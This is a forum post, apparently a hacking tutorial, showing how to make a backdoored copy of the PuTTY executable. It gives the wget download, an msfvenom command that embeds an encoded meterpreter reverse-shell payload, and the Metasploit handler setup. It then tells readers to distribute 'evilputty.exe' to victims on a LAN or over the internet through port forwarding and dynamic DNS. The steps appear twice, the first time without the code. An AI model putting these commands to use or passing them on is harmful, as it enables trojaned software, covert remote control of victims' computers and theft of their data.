- by x32x01 ||
Today, we’re going to create windows executable backdoor using Metasploit Exploitation Framework’s using msfvenom.
Attacker’s IP: 192.168.1.2
Victim’s IP: 192.168.1.x (within LAN network it might be any IP)
1- Open terminal and download putty using wget.
2- I was in root directory when i used above command. So, putty got downloaded in /root/ directory.
Now use msfvenom to backdoor this executable using the following command.
Above command will generate an EXE file with the name evilputty.exe. This is our backdoored executable file.
3- Start metasploit.
4- Start metasploit’s reverse handler to get a reverse connection.
5- Distribute this evilputty.exe file in your LAN/Wifi network and wait for victim. When victim will open this evilputty.exe , you will get a reverse shell on your metasploit’s handler. Happy Hacking
Follow my following tutorial for better understanding of metasploit’s working over internet.
If you successfully port forwarded and open your port.
You’re public ip address might not be static so in that case you should be using NO-IP DNS to get a static address.
Simple write your NO-IP Host in LHOST=example.noip.com
If you have any questions related to port forwarding or attacking in WAN Network please don’t forget to comment below!
How To Backdoor Windows Executables Using Metasploit
First make sure Metasploit is already installed.
If you’re using Mac/Linux you can install Metasploit by using this method. If you’re using Kali Linux then Metasploit is pre-installed on it.For LAN/Wifi Networks:
Now follow me step by step:Attacker’s IP: 192.168.1.2
Victim’s IP: 192.168.1.x (within LAN network it might be any IP)
1- Open terminal and download putty using wget.
Code:
wget http://the.earth.li/~sgtatham/putty/0.63/x86/putty.exe2- I was in root directory when i used above command. So, putty got downloaded in /root/ directory.
Now use msfvenom to backdoor this executable using the following command.
Code:
msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/putty.exe LHOST=192.168.0.14 LPORT=5555 > evilputty.exe3- Start metasploit.
Code:
msfconsole4- Start metasploit’s reverse handler to get a reverse connection.
Code:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 5555
exploit5- Distribute this evilputty.exe file in your LAN/Wifi network and wait for victim. When victim will open this evilputty.exe , you will get a reverse shell on your metasploit’s handler. Happy Hacking
For WAN Or Internet:
To use this method over WAN/Internet, you need to forward your ports.Follow my following tutorial for better understanding of metasploit’s working over internet.
If you successfully port forwarded and open your port.
Code:
msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/putty.exe LHOST=”YOUR PUBLIC IP ADDRESS” LPORT=5555 > evilputty.exeYou’re public ip address might not be static so in that case you should be using NO-IP DNS to get a static address.
Simple write your NO-IP Host in LHOST=example.noip.com
If you have any questions related to port forwarding or attacking in WAN Network please don’t forget to comment below!